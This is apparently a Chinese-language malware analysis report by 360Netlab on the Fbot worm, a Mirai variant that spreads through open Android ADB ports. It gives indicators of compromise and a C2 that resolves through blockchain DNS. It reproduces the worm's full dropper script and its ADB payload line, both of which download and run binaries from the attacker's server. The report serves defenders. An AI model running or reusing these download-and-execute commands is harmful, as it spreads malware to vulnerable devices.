IoC
下载服务器
188.209.52.142 Netherlands/NL AS49349
C2服务器
musl.lib 由区块链DNS系统emercoin.com解析,当前的解析IP地址是在下面 66.42.57.45:7000 Singapore/SG Singapore
下载URL
hxxp://188.209.52.142/c #脚本,会下载执行fbot.{arch}样本、卸载 com.ufo.miner 组件,并做清理 hxxp://188.209.52.142/w #脚本,会下载执行fbot.{arch}样本、卸载 com.ufo.miner 组件,并做清理 hxxp://188.209.52.142/fbot.aarch64 #扫描器,下同,完成自身的蠕虫传播 hxxp://188.209.52.142/fbot.arm7 hxxp://188.209.52.142/fbot.mips hxxp://188.209.52.142/fbot.mipsel hxxp://188.209.52.142/fbot.x86 hxxp://188.209.52.142/fbot.x86_64
分析
恶意样本通过 adb 安卓系统调试接口投入,这与之前的 adb.miner 的投入方式一致。
投入载荷会下载执行 hxxp://188.209.52.142/c,或者是hxxp://188.209.52.142/w。这两个脚本的区别仅在下载方式是wget/curl,下文不再区分。主体功能一致,包括:
- 尝试进一步从 188.209.52.142 下载 fbot.{arch} 恶意样本;
- 卸载 com.ufo.miner,即ADB.Miner;
- 完成自身清理工作。
该脚本的详细内容如下:
#!/system/bin/sh n="arm7 mipsel mips x86 x86_64 aarch64" http_server="188.209.52.142" for i in $n do cp /system/bin/sh fbot.$i >fbot.$i curl hxxp://$http_server/fbot.$i > fbot.$i # wget hxxp://$http_server/fbot.$i > fbot.$i chmod 777 fbot.$i ./fbot.$i rm fbot.$i done # Cleanup for i in $n do rm fbot.$i done pm uninstall com.ufo.miner # Suicide rm $0
下载得到的 fbot.{arch} 是个mirai的变种,改动的部分包括:
- C2:66.42.57.45:7000,Singapore/SG Singapore
- 扫描:改为针对 TCP 5555 adb 端口扫描。扫描成功后,会下载hxxp://188.209.52.142/c,完成对蠕虫自身的传播。
- 杀进程:样本中会遍历 /proc/pid/exe 目录下面的特定进程,如smi/xig/rig等。枚举得到符合条件的进程后,会杀掉该进程。
该变种保留了 mirai 僵尸网络的DDoS功能,但我们尚未检测到该C2有发出DDoS攻击指令。
扫描阶段的payload如下:
shell:cd /data/local/tmp/; busybox wget hxxp://188.209.52.142/w -O -> w; sh w; rm w; curl http://188.209.52.142/c > c; sh c; rm c
枚举进程列表
/data/local/tmp/smi /data/local/tmp/xig /data/local/tmp/trinity /data/local/tmp/z /data/local/tmp/log /data/local/tmp/rig /data/local/tmp/.f /data/local/tmp/tyg
musl.lib 的域名解析
该C2域名不是一个标准的DNS域名,其顶级域 .lib 并没有在 ICANN 注册,因而也不能为通用的DNS系统解析。
该域名需要在emercoin.com上解析。当前的解析记录,见下面的连接。emercoin.com 是一个基于区块链的DNS系统。https://explorer.emercoin.com/nvs//musl.lib//25/1/1
emercoin.com 当前利用了 OpenNic 提供的公共DNS解析服务器来桥接传统DNS和区块链DNS。被感染的机器,会利用硬编码的 OpenNic 下属公共DNS解析服务器完成域名解析。这些DNS解析服务器至少包括:
163.53.248.170 174.138.48.29 5.132.191.104
联系我们
感兴趣的读者,可以在 twitter 或者在微信公众号 360Netlab 上联系我们。或者发送邮件给 netlab at 360 dot cn 。